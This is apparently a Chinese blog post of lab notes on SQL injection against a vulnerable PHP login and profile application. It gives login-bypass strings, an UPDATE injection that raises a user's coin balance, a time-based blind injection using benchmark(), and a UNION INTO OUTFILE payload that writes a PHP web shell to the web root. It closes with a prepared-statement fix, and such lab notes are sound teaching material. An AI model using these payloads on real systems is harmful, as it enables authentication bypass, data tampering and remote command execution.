标签:根目录 src chm middle order val 示例 ack osi
| a‘# | 用户a登录 |
| a‘ or 1# | |
| a‘ or 1=1# | |
| a‘ and 1;# | |
| d‘ or 1# | |
| a‘ or ‘1 |
| b‘ or 0;# | 用户b登录 |
 |
 |
 |
 |
| a‘, Coins=100 where Username=‘a‘ ;# |
 |
 |
| c‘ union select 1,1,1,1,1,1,if(substring(database(),1,1)=char(119),benchmark(5000000,encode(‘aaa‘,‘bbbb‘),NULL);# |
 |
 |
$sql = "select * from Person where Username = ‘$username‘ and Password = ‘$password‘"; $sql = “ select * from Person where Username = ‘a‘ or 1# ‘ and Password = ‘$password‘";
$sql = "UPDATE Person SET Profile= ‘$profile‘" "WHERE PersonID = ‘$personID‘"; $sql = "UPDATE Person SET Profile= ‘b‘,zoobars=100 where Username=‘b‘;# "WHERE PersonID = ‘$personID‘";
$sql = "select * from Person where Username = ‘$username‘
// union:两条select都执行;要求前后select列数相等 $sql = "select * from Person where Username = ‘c‘ union select 1,1,1,1,1,1, if(substring(database(),1,1)=char(119), benchmark(5000000, encode(‘aaa‘,‘bbbb‘)), NULL);#
// 把union查询结果写到文件中 $sql = "select * from Person where Username = ‘d‘ union select 1,1,1,1,1,1,‘<?php system($_GET[cmd]);?>‘ into outfile "/home/web/WebSec/1.php";# // 写成功条件:知道当前网站根目录;mysql要拥有写权限;网站根目录要允许被其他进程写
$stmt = $db->prepare("SELECT * FROM users WHERE name=? AND age=?"); $stmt->bind_param("si", $user, $age);
标签:根目录 src chm middle order val 示例 ack osi
原文地址:https://www.cnblogs.com/tianjiazhen/p/12235930.html
